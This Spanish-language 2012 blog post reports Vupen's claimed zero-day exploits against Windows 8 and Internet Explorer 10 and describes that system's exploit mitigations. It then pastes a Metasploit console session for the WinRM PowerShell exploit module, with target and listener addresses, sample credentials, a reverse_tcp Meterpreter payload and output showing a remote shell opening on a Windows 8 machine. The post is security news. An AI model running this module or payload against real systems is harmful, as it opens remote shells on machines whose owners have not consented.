viernes, 2 de noviembre de 2012

Primeros exploits de día 0 para Windows 8


Menos de una semana después de que Microsoft lanzara su flamante Windows 8, los hackers franceses de Vupen han desarrollado un exploit para este nuevo sistema operativo e Internet Explorer 10. Chaouki Bekrar, CEO de Vupen, escribía en Twitter "Damos la bienvenida a #Windows 8 con varios 0Ds combinados para pwn todas las nuevas mitigaciones de exploits de Win8/IE10, Felicidades a nuestro mitigador de mitigaciones @n_joly".

Recordemos que, entre las características de seguridad de Microsoft Windows 8, se incluye por defecto DEP (Data Execution Protection) y ASLR (Address Space Layout Randomization) para aleatorizar la localización de las instrucciones de los programas en memoria e impedir que se ejecuten datos en algunas direcciones específicas. Además, se añaden técnicas antiROP (Return-oriented programming) para proteger estos dos métodos y se incluye la aplicación anti-malware Windows Defender y la última versión de Internet Explorer utiliza un "sandbox" llamado  AppContainer para intentar impedir que se ataque directamente al sistema a través del navegador.

Sin embargo, es evidente que Windows 8 no es invulnerable y ya en la conferencia Black Hat de este verano se mostraron exploits que teóricamente evadían sus medidas de seguridad. Tarjei Mandt, investigador de seguridad Azimuth Security comentaba "El kernel de Windows 8 fundamentalmente no cambia ninguno de los algoritmos usados en Windows 7 ... Más que nada es una versión fortificada de Windows 7 sin cambios estructurales significativos, pero incluye muchas más comprobaciones".

Por otra parte Microsoft alega que vieron el tweet de Vupen pero que dicha organización todavía no ha compartido con ellos los detalles. Y es que Vupen se lucra en gran parte gracias a la venta de sus hacks e información a agencias gubernamentales y, en definitiva, al mejor postor: "Nuestro primer 0day para Win8+IE10 con HiASLR/AntiROP/DEP y evasión del Mod Prot sandbox (no necesario Flash) está ya disponible para clientes. Bienvenido #Windows8".


Además, en las últimas horas se ha liberado un módulo de Metasploit capaz de explotar el servicio Windows Remote Management (WinRM) para obtener una sesión de Meterpreter. Bienvenido Windows 8 a este nuestro mundo cruel xD:


    msf  exploit(winrm_powershell) > show options
    
   
Module options (exploit/windows/winrm/winrm_powershell):
    
      
Name      Current Setting  Required  Description
      
----      ---------------  --------  -----------
       DOMAIN    WORKSTATION      yes      
The domain to use for Windows authentification
       PASSWORD  omfg            
no        A specific password to authenticate with
      
Proxies                    no        Use a proxy chain
       RHOST    
10.6.255.158     yes       The target address
       RPORT    
5985             yes       The target port
       URI      
/wsman           yes       The URI of the WinRM service
       USERNAME  sinn3r          
no        A specific username to authenticate as
       VHOST                     
no        HTTP server virtual host
    
    
   
Payload options (windows/meterpreter/reverse_tcp):
    
      
Name      Current Setting  Required  Description
      
----      ---------------  --------  -----------
       EXITFUNC  thread           yes      
Exit technique: seh, thread, process, none
       LHOST    
10.6.255.84      yes       The listen address
       LPORT    
4444             yes       The listen port
    
    
   
Exploit target:
    
      
Id  Name
      
--  ----
      
0   Automatic
    
    
    msf  exploit
(winrm_powershell) > rexploit
   
[*] Reloading module...
    
   
[*] Started reverse handler on 10.6.255.84:4444
   
[*] Attempting to set Execution Policy
   
[*] Grabbing %TEMP%
   
[*] uploading powershell script to C:\Users\sinn3r\AppData\Local\Temp\uUIpRDrz.ps1
   
[*] Attempting to execute script...
   
[*] Sending stage (752128 bytes) to 10.6.255.158
   
[*] Meterpreter session 1 opened (10.6.255.84:4444 -> 10.6.255.158:49535) at 2012-10-31 17:09:00 -0500
    
    meterpreter
>
   
[*] Session ID 1 (10.6.255.84:4444 -> 10.6.255.158:49535) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
   
[*] Current server process: powershell.exe (2844)
   
[+] Migrating to 696
   
[+] Successfully migrated to process
    
    meterpreter
> sysinfo
   
Computer        : WIN-VFQHRRTCA39
    OS             
: Windows 8 (Build 9200).
   
Architecture    : x86
   
System Language : en_US
   
Meterpreter     : x86/win32
    meterpreter
>
 





 Fuentes:

Government hackers develop Windows 8 exploit – already

 
Security firm VUPEN claims to have hacked Windows 8 and IE10 


VUPEN Researchers Say They Have Zero-Day Windows 8 Exploit 


Weekly Metasploit Update: WinRM Part One, Exploiting Metasploit, and More! 


No hay comentarios:

Publicar un comentario